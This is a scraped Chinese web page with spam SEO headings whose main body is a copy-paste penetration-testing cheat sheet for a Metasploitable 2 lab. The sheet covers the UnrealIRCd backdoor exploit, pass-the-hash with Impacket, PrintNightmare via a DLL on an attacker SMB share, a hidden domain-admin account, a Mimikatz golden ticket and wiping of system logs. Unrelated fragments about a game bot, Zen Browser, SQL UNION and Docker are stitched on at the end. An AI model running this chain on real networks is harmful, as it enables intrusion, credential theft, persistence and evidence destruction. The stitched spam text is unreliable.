建设银行网银网站特色定制网页制作公司

张小明 2026/1/11 15:11:58
建设银行网银网站特色,定制网页制作公司,英文网站建设风格特点,网站建设的软件介绍本速查表基于之前的 VulhubMetasploitable 2 靶场实操清单#xff0c;涵盖从外网突破到持久化的全流程命令#xff0c;可直接复制执行。环境说明#xff1a;攻击机 Kali#xff08;192.168.56.101#xff09;、跳板机 Metasploitable 2#xff08;192.168.56.102#xf…本速查表基于之前的VulhubMetasploitable 2 靶场实操清单涵盖从外网突破到持久化的全流程命令可直接复制执行。环境说明攻击机 Kali192.168.56.101、跳板机 Metasploitable 2192.168.56.102、域控制器192.168.56.103、域内主机192.168.56.104一、 外网突破获取跳板机权限1. 端口扫描与漏洞发现bash运行# nmap 全端口版本扫描 nmap -sV -p- 192.168.56.102 # 搜索 UnrealIRCd 漏洞模块msfconsole 内执行 msfconsole search unrealircd use exploit/unix/irc/unrealircd_3281_backdoor set RHOSTS 192.168.56.102 run2. 获取 Meterpreter 会话后基础操作bash运行# 查看跳板机系统信息 sysinfo # 切换到系统 shell shell # 后台挂起会话返回 msfconsole background二、 内网信息收集1. 内网存活主机探测bash运行# Meterpreter 内执行 ping 扫描 run post/multi/gather/ping_sweep RHOSTS192.168.56.0/24 # 手动 ARP 扫描Kali 本机执行 arp-scan -l # 扫描当前网段 fping -g 192.168.56.0/24 # 批量 ping 探测2. 域环境信息枚举bash运行# 检测是否存在域跳板机 shell 内执行 ipconfig /all # 查看 DNS 后缀 net config workstation # 查询域控制器列表 nltest /dclist:test.com # Impacket 工具查询域用户Kali 执行 python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103 # BloodHound 可视化域权限Kali 执行 bloodhound # 启动工具导入域信息3. 主机详细信息收集系统类型核心命令Windowssysteminfo系统补丁netstat -ano网络连接tasklist /svc进程服务Linuxuname -a内核版本ps -ef进程find / -perm -us -type f 2/dev/nullSUID 文件三、 横向移动哈希传递攻击PTH1. 提取目标用户哈希bash运行# Windows 主机哈希提取Meterpreter 内 run post/windows/gather/hashdump # Linux 主机凭证扫描跳板机 shell 内 wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod x linpeas.sh ./linpeas.sh2. Impacket PTH 横向移动Kali 执行bash运行# 格式psexec.py 域名/用户名目标IP -hashes LM哈希:NTLM哈希 python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef # 若获取明文密码直接登录 WinRM evil-winrm -i 192.168.56.104 -u user1 -p Pssw0rd!四、 权限提升PrintNightmare 漏洞利用1. 攻击机准备恶意 DLL 与 SMB 共享bash运行# 下载漏洞利用脚本 git clone https://github.com/cube0x0/CVE-2021-34527.git cd CVE-2021-34527 # 启动 SMB 共享供靶机下载 DLL impacket-smbserver share . -smb2support2. 靶机执行提权命令Windows 10 主机 shell 内cmd# 挂载攻击机 SMB 共享 net use \\192.168.56.101\share # 执行提权脚本获取 SYSTEM 权限 CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll五、 持久化域内留后门1. 创建隐藏域管理员账户cmd# 在域控制器执行创建带 $ 隐藏账户 net user hidden_admin Pssw0rd! /add /domain net group Domain Admins hidden_admin /add /domain2. 生成黄金票据Mimikatz 执行bash运行# 提取 KRBTGT 账户哈希 mimikatz.exe lsadump::lsa /inject /name:krbtgt exit # 生成黄金票据替换 SID 和哈希值 mimikatz.exe kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt exit六、 痕迹清理1. Windows 日志清理cmd# 清空系统、安全、应用日志 wevtutil cl System wevtutil cl Security wevtutil cl Application2. Linux 日志清理bash运行# 清空 SSH 登录日志和系统日志 echo /var/log/auth.log echo /var/log/syslog # 清空命令历史记录 history -c history -w七、 常用工具命令速查工具用途命令Impacket 横向移动python3 wmiexec.py test.com/admin192.168.56.104 -hashes 哈希值密码哈希破解john --formatNT --wordlist/usr/share/wordlists/rockyou.txt hash.txt端口扫描masscan 192.168.56.0/24 -p 135,445,3389 --rate1000提权扫描./PrivescCheck.ps1Windows./linpeas.shLinux
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

建德建设局网站wordpress静态化nginx

智能游戏自动化助手:终极高效解决方案 【免费下载链接】better-wuthering-waves 🌊更好的鸣潮 - 后台自动剧情 项目地址: https://gitcode.com/gh_mirrors/be/better-wuthering-waves BetterWutheringWaves是一款专为现代游戏玩家设计的智能自动化…

张小明 2026/1/11 15:11:58 网站建设

北京市住房和城乡建设厅网站外贸市场推广

还在为浏览器卡顿、隐私泄露而烦恼吗?Zen Browser将为您带来全新的浏览体验!这款基于Firefox深度优化的浏览器,专为追求效率与隐私的用户量身打造。无论您是第一次接触还是想要深入了解,这份完整指南都将带您轻松上手,…

张小明 2026/1/11 15:09:56 网站建设

在线旅游网站网站策划书撰写

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容: 设计一个高可用电商平台的系统架构,包括前端、后端、数据库、缓存、消息队列等组件。要求支持每秒10万级并发,99.99%的可用性,并考虑容灾备份方案…

张小明 2026/1/11 15:07:55 网站建设

网站建设 黑龙江织梦网站免费模板

第一章:边缘环境下Docker监控的挑战与演进在边缘计算架构中,Docker容器被广泛用于部署轻量级、可移植的应用服务。然而,受限的硬件资源、网络不稳定性和分散的部署拓扑,为容器监控带来了显著挑战。传统集中式监控方案难以适应边缘…

张小明 2026/1/11 15:05:52 网站建设

电子商务网站建设规划说明书网站搭建设计 是什么

基本语法结构SELECT column1, column2 FROM table1 UNION SELECT column1, column2 FROM table2;列数要求所有 SELECT 语句的列数必须完全一致,否则会触发语法错误。列名规则最终结果集的列名以第一个 SELECT 语句中的列名为准,后续语句的列名不影响输出…

张小明 2026/1/11 15:03:49 网站建设

重庆建设教育协会网站淄博市网站建设

贝贝BiliBili:快速批量下载B站视频的终极工具 【免费下载链接】贝贝BiliBili-B站视频下载 贝贝BiliBili是一款专为B站视频下载设计的PC工具,功能强大且操作简便。它支持批量下载,显著提升下载效率,尤其适合需要大量保存视频的用户…

张小明 2026/1/11 15:01:45 网站建设